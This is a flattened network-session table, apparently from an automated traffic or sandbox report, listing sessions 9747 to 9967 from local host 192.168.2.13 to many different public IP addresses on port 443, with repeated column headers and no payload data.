                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9747192.168.2.1337050181.52.82.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9748192.168.2.134583086.224.31.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9749192.168.2.1355190166.180.53.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9750192.168.2.133351050.40.161.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9751192.168.2.133303836.195.174.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9752192.168.2.1348890139.214.126.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9753192.168.2.134356450.48.245.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9754192.168.2.1344874110.75.163.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9755192.168.2.136004096.66.44.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9756192.168.2.1348906194.75.233.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9757192.168.2.1346980163.4.20.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9758192.168.2.1350884157.73.128.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9759192.168.2.1336028184.207.1.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9760192.168.2.1334390153.4.86.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9761192.168.2.1333424136.67.65.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9762192.168.2.1353808180.208.40.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9763192.168.2.1336162136.211.191.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9764192.168.2.1339798221.236.134.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9765192.168.2.1351126211.154.79.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9766192.168.2.1336488153.173.78.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9767192.168.2.1360690219.110.13.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9768192.168.2.13597541.237.150.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9769192.168.2.134988247.239.81.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9770192.168.2.134711435.139.89.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9771192.168.2.1342736114.38.206.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9772192.168.2.134577078.163.22.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9773192.168.2.135672640.126.34.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9774192.168.2.1343402107.79.17.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9775192.168.2.134407677.112.1.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9776192.168.2.135438432.58.71.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9777192.168.2.1336630143.230.59.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9778192.168.2.1343054163.137.136.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9779192.168.2.134285864.189.139.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9780192.168.2.135705850.153.86.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9781192.168.2.1334626219.125.187.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9782192.168.2.1342456132.29.206.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9783192.168.2.1351230139.77.233.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9784192.168.2.135350643.123.137.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9785192.168.2.133619077.156.237.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9786192.168.2.133537497.169.105.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9787192.168.2.1357584200.1.164.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9788192.168.2.1341434138.62.6.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9789192.168.2.1359048130.104.48.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9790192.168.2.133372290.112.202.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9791192.168.2.1342638144.12.5.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9792192.168.2.1337596116.8.74.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9793192.168.2.133674894.174.20.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9794192.168.2.133722234.177.59.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9795192.168.2.133910086.27.18.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9796192.168.2.1358640126.17.212.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9797192.168.2.134816466.136.216.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9798192.168.2.1348936138.156.50.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9799192.168.2.1348746211.22.241.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9800192.168.2.1357674159.72.9.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9801192.168.2.135897462.53.195.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9802192.168.2.133589481.33.218.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9803192.168.2.1344730163.173.117.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9804192.168.2.1350940141.208.226.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9805192.168.2.133426265.105.86.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9806192.168.2.1336624164.139.78.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9807192.168.2.1350306168.211.180.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9808192.168.2.1332926156.12.143.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9809192.168.2.1333832165.115.109.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9810192.168.2.133455677.207.37.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9811192.168.2.135513685.245.129.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9812192.168.2.135788675.120.174.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9813192.168.2.135205459.139.120.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9814192.168.2.1355042170.82.118.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9815192.168.2.1344050206.54.148.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9816192.168.2.1351148133.226.36.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9817192.168.2.1336636194.219.116.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9818192.168.2.135770240.19.138.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9819192.168.2.135112262.136.112.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9820192.168.2.1340554151.203.195.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9821192.168.2.134428886.145.102.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9822192.168.2.1343428142.64.175.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9823192.168.2.135799478.234.235.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9824192.168.2.133701280.98.181.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9825192.168.2.1344620213.163.34.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9826192.168.2.1352146176.212.253.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9827192.168.2.1346098162.24.49.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9828192.168.2.133569679.42.155.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9829192.168.2.1341680182.82.185.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9830192.168.2.135192858.165.201.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9831192.168.2.1355186199.127.248.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9832192.168.2.134492494.59.53.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9833192.168.2.1343054103.221.189.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9834192.168.2.1335020131.51.24.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9835192.168.2.1345054167.56.162.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9836192.168.2.1350720159.99.36.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9837192.168.2.1357354206.43.230.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9838192.168.2.1350826170.107.35.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9839192.168.2.1343922147.42.136.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9840192.168.2.1338104149.58.87.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9841192.168.2.1338864193.142.217.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9842192.168.2.1346816178.36.23.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9843192.168.2.1349396203.123.255.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9844192.168.2.1359976151.194.183.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9845192.168.2.1339356133.159.91.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9846192.168.2.1359906115.12.204.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9847192.168.2.134670834.152.186.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9848192.168.2.1338228157.207.23.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9849192.168.2.1356472196.169.6.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9850192.168.2.1335962207.247.73.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9851192.168.2.1334676103.251.167.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9852192.168.2.1335954191.95.2.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9853192.168.2.1334794199.87.52.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9854192.168.2.1340988108.145.235.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9855192.168.2.1350354115.211.105.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9856192.168.2.1357498147.162.17.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9857192.168.2.1356524197.74.85.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9858192.168.2.1342552122.156.57.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9859192.168.2.1336420129.4.107.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9860192.168.2.134806020.37.110.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9861192.168.2.1332866196.80.75.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9862192.168.2.1352140200.131.46.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9863192.168.2.1351572191.125.79.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9864192.168.2.133423444.199.187.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9865192.168.2.1353040206.72.111.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9866192.168.2.1349328128.162.246.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9867192.168.2.134149846.92.169.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9868192.168.2.1358522119.43.93.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9869192.168.2.13542662.75.147.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9870192.168.2.1343020220.157.228.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9871192.168.2.1357690149.154.182.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9872192.168.2.133998082.68.111.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9873192.168.2.1344652133.157.156.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9874192.168.2.1343720161.77.60.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9875192.168.2.134828427.107.21.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9876192.168.2.134760864.145.124.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9877192.168.2.1356946137.254.142.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9878192.168.2.134672018.53.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9879192.168.2.135451454.133.200.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9880192.168.2.1359808134.120.179.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9881192.168.2.135435075.23.39.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9882192.168.2.1357198122.28.244.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9883192.168.2.136080295.1.80.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9884192.168.2.135073272.246.167.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9885192.168.2.1359996170.83.244.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9886192.168.2.134409251.11.150.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9887192.168.2.1338826144.180.150.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9888192.168.2.1345128150.50.154.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9889192.168.2.1350356191.145.174.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9890192.168.2.1358196184.236.31.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9891192.168.2.135058866.212.26.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9892192.168.2.1344838159.44.93.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9893192.168.2.136050634.123.70.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9894192.168.2.1359206103.28.226.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9895192.168.2.1337612126.150.38.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9896192.168.2.1355638219.140.126.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9897192.168.2.133405296.85.31.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9898192.168.2.1339348149.174.187.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9899192.168.2.1346684194.7.130.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9900192.168.2.1360500113.126.221.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9901192.168.2.1354218222.24.47.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9902192.168.2.135419832.102.245.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9903192.168.2.1339922114.156.16.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9904192.168.2.1337544102.14.22.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9905192.168.2.1334568149.181.185.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9906192.168.2.134372882.179.196.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9907192.168.2.135034267.32.121.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9908192.168.2.134029679.115.17.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9909192.168.2.1337830191.199.41.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9910192.168.2.1356054120.96.242.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9911192.168.2.1341994194.143.221.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9912192.168.2.1350742145.243.208.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9913192.168.2.1336834185.69.113.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9914192.168.2.135478096.122.32.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9915192.168.2.1333294162.98.251.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9916192.168.2.135174438.130.254.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9917192.168.2.1355656187.220.16.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9918192.168.2.134360252.212.224.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9919192.168.2.1360240153.168.222.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9920192.168.2.13356669.93.196.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9921192.168.2.1335422205.154.29.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9922192.168.2.134957097.109.128.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9923192.168.2.1355032131.234.193.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9924192.168.2.133732847.174.197.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9925192.168.2.135465280.88.251.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9926192.168.2.133522244.157.235.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9927192.168.2.1340344103.231.46.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9928192.168.2.1354660160.61.199.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9929192.168.2.135999420.120.201.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9930192.168.2.1344388174.105.17.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9931192.168.2.135420680.85.169.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9932192.168.2.1344244155.101.145.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9933192.168.2.1360424119.22.52.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9934192.168.2.1353034222.194.49.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9935192.168.2.133609088.242.52.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9936192.168.2.1358304205.26.235.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9937192.168.2.135309277.56.218.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9938192.168.2.1360986180.231.157.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9939192.168.2.134416612.48.119.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9940192.168.2.135169871.229.39.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9941192.168.2.13555449.3.58.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9942192.168.2.133470463.89.12.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9943192.168.2.1337814119.96.167.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9944192.168.2.1339568115.74.239.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9945192.168.2.133745861.239.190.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9946192.168.2.1355788120.225.171.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9947192.168.2.1350154119.220.27.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9948192.168.2.1336110167.25.36.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9949192.168.2.1334908113.231.96.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9950192.168.2.1353180149.247.247.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9951192.168.2.1357326114.52.65.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9952192.168.2.1332996197.216.52.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9953192.168.2.134896049.140.68.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9954192.168.2.133344814.107.120.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9955192.168.2.1346786142.154.1.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9956192.168.2.133550272.194.127.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9957192.168.2.13348145.24.151.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9958192.168.2.1344246124.177.23.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9959192.168.2.1344768202.122.177.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9960192.168.2.133639696.251.220.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9961192.168.2.133779473.50.244.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9962192.168.2.1353452105.84.48.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9963192.168.2.1358678185.50.217.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9964192.168.2.1360302190.28.75.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9965192.168.2.135356690.105.63.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9966192.168.2.1342104156.133.120.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9967192.168.2.1334916186.27.32.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
